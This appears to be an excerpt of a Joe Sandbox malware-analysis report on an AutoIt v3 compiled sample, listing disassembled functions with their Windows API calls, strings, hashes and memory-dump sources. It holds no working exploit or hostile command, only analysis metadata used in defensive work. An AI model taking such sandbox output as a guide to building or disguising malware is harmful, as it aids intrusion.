                                                                                                                                                        • Instruction ID: 161bb9a8234e8b02c13c3217c585bea901b04d7b018ca4cb88b7f9c96a5b7127
                                                                                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                        • Instruction Fuzzy Hash: D1C1D27220529349DF2D473984348BFFFA95EA27B131A4B6DD4B3CB4C2EE24D564C660
                                                                                                                                                        Function 00AEA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00AEA7A5
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00AEA7B7
                                                                                                                                                        • DestroyWindow.USER32 ref: 00AEA7C5
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00AEA7DF
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00AEA7E6
                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00AEA927
                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00AEA937
                                                                                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA97F
                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00AEA98B
                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AEA9C5
                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA9E7
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA9FA
                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA05
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00AEAA0E
                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA1D
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00AEAA26
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA2D
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00AEAA38
                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00AEAA4A
                                                                                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B1D9BC,00000000), ref: 00AEAA60
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00AEAA70
                                                                                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00AEAA96
                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00AEAAB5
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAAD7
                                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEACC4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                                        • Opcode ID: 9584c48e2bc009f898f6b9bfb2bd714693bf74213b4387b07e86cd13fab465a6
                                                                                                                                                        • Instruction ID: b91cc3d18dbd3ee4cac60cb7cb84185954c7f2b18228e246bbd3e2a4069d16f8
                                                                                                                                                        • Opcode Fuzzy Hash: 9584c48e2bc009f898f6b9bfb2bd714693bf74213b4387b07e86cd13fab465a6
                                                                                                                                                        • Instruction Fuzzy Hash: 6302AD71A00254EFDB14DFA9CD89EAE7BB9FF48310F148559F905AB2A1DB30AD41CB60
                                                                                                                                                        Function 00AFD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00AFD0EB
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AFD11C
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00AFD128
                                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00AFD142
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AFD151
                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD17C
                                                                                                                                                        • GetSysColor.USER32(00000010), ref: 00AFD184
                                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00AFD18B
                                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00AFD19A
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00AFD1A1
                                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00AFD1EC
                                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 00AFD21E
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AFD249
                                                                                                                                                          • Part of subcall function 00AFD385: GetSysColor.USER32(00000012), ref: 00AFD3BE
                                                                                                                                                          • Part of subcall function 00AFD385: SetTextColor.GDI32(?,?), ref: 00AFD3C2
                                                                                                                                                          • Part of subcall function 00AFD385: GetSysColorBrush.USER32(0000000F), ref: 00AFD3D8
                                                                                                                                                          • Part of subcall function 00AFD385: GetSysColor.USER32(0000000F), ref: 00AFD3E3
                                                                                                                                                          • Part of subcall function 00AFD385: GetSysColor.USER32(00000011), ref: 00AFD400
                                                                                                                                                          • Part of subcall function 00AFD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AFD40E
                                                                                                                                                          • Part of subcall function 00AFD385: SelectObject.GDI32(?,00000000), ref: 00AFD41F
                                                                                                                                                          • Part of subcall function 00AFD385: SetBkColor.GDI32(?,00000000), ref: 00AFD428
                                                                                                                                                          • Part of subcall function 00AFD385: SelectObject.GDI32(?,?), ref: 00AFD435
                                                                                                                                                          • Part of subcall function 00AFD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD454
                                                                                                                                                          • Part of subcall function 00AFD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AFD46B
                                                                                                                                                          • Part of subcall function 00AFD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00AFD480
                                                                                                                                                          • Part of subcall function 00AFD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AFD4A8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3521893082-0
                                                                                                                                                        • Opcode ID: 1b2ce8df4ec3db575beedf84141efdacd2f4d2db0e1871ac8f60c0d0be9385ab
                                                                                                                                                        • Instruction ID: 43981bdc3efab0ab6491cb012e8db46238192b20cf5fceadac71b84b53072913
                                                                                                                                                        • Opcode Fuzzy Hash: 1b2ce8df4ec3db575beedf84141efdacd2f4d2db0e1871ac8f60c0d0be9385ab
                                                                                                                                                        • Instruction Fuzzy Hash: 2A918072008305BFC7119F64DC08EAB7BAAFF89320F504A19FA62A71E0DB75D944CB52
                                                                                                                                                        Function 00AEA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00AEA42A
                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AEA4E9
                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00AEA527
                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00AEA539
                                                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00AEA57F
                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00AEA58B
                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00AEA5CF
                                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AEA5DE
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00AEA5EE
                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00AEA5F2
                                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00AEA602
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AEA60B
                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00AEA614
                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AEA642
                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AEA659
                                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00AEA694
                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AEA6A8
                                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AEA6B9
                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00AEA6E9
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00AEA6F4
                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AEA6FF
                                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00AEA709
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                                        • Opcode ID: 0dd9bcad48b83608cfb513bffdc2a4b522b9fd97a258c8c67e9877a16fe19f2f
                                                                                                                                                        • Instruction ID: 0bb073e0745a0ebc1031e239ce3d6e92ed1449a3ec959fb1425170b5021cd54c
                                                                                                                                                        • Opcode Fuzzy Hash: 0dd9bcad48b83608cfb513bffdc2a4b522b9fd97a258c8c67e9877a16fe19f2f
                                                                                                                                                        • Instruction Fuzzy Hash: 7FA17071A00215BFEB14DBA9DD4AFAE7BB9EB44711F008555F614EB2E0DBB0AD40CB60
                                                                                                                                                        Function 00ADE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00ADE45E
                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00B2DC88,?,\\.\,00B2DBF0), ref: 00ADE54B
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00B2DC88,?,\\.\,00B2DBF0), ref: 00ADE6B1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                                        • Opcode ID: a99dd56393d1e0e62b8150efd8829934fc3493c1de01e67108015c6edcf8f279
                                                                                                                                                        • Instruction ID: 25d41faca3a50b036e1525b635323de7b8afa6a4ca38cede801ac73139356fd6
                                                                                                                                                        • Opcode Fuzzy Hash: a99dd56393d1e0e62b8150efd8829934fc3493c1de01e67108015c6edcf8f279
                                                                                                                                                        • Instruction Fuzzy Hash: 9651B330208341ABC600FF14C9D1969B7F1EBA4B44B64895BF447AF3E2DB60DF45EA42
                                                                                                                                                        Function 00A9C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                        • API String ID: 1038674560-86951937
                                                                                                                                                        • Opcode ID: fbe6c88d35a7c851c2b9771fb04ed8cd7a3c8dabb9c94a0e9cbd5f42263cc782
                                                                                                                                                        • Instruction ID: 64252625bfc45a6d79bc1907b212cc2475de204a495fc6a5f3ae00d06746d538
                                                                                                                                                        • Opcode Fuzzy Hash: fbe6c88d35a7c851c2b9771fb04ed8cd7a3c8dabb9c94a0e9cbd5f42263cc782
                                                                                                                                                        • Instruction Fuzzy Hash: D7613631740B217BDF21EB64AD82FBA33ECAF15750F144065F846AA5D7EBA0DA01C7A1
                                                                                                                                                        Function 00A948C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DestroyWindow.USER32 ref: 00A94956
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00A94998
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00A949A3
                                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 00A949AE
                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00A949B9
                                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B0E179
                                                                                                                                                        • 6F550200.COMCTL32(?,000000FF,?), ref: 00B0E1B2
                                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00B0E5E0
                                                                                                                                                          • Part of subcall function 00A949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A94954,00000000), ref: 00A94A23
                                                                                                                                                        • SendMessageW.USER32 ref: 00B0E627
                                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B0E63E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DestroyMessageSendWindow$DeleteObject$CursorF550200InvalidateMoveRect
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2586706302-4108050209
                                                                                                                                                        • Opcode ID: 2978a88501becf36cae65cfa2c12de27e966714b0058d41c52d0ee35c092863b
                                                                                                                                                        • Instruction ID: 3fc1a4552afdd381dc3c70f51ce26b04ad19cd12aaa3f6d34fd95b77971ee4ad
                                                                                                                                                        • Opcode Fuzzy Hash: 2978a88501becf36cae65cfa2c12de27e966714b0058d41c52d0ee35c092863b
                                                                                                                                                        • Instruction Fuzzy Hash: 62128030604201DFDB25CF14C984BAABBE5FF59304F5449A9F9A9DB2A2C731EC46CB91
                                                                                                                                                        Function 00AFC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00AFC598
                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00AFC64E
                                                                                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00AFC669
                                                                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00AFC925
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2326795674-4108050209
                                                                                                                                                        • Opcode ID: dc0807bb2f47948effd594cf3adb2dd4a68d1e5f47932a340e444eb2c81d6b8b
                                                                                                                                                        • Instruction ID: 8162d441dad675f82b40abd5c19ace9c93693767cba471fd027f812c2f10f195
                                                                                                                                                        • Opcode Fuzzy Hash: dc0807bb2f47948effd594cf3adb2dd4a68d1e5f47932a340e444eb2c81d6b8b
                                                                                                                                                        • Instruction Fuzzy Hash: 3FF1027110430DAFE721DF65CA84BBABBE5FF493A4F044A29F688932A1C774D840DB91
                                                                                                                                                        Function 00AF6189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(?,?,00B2DBF0), ref: 00AF6245
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
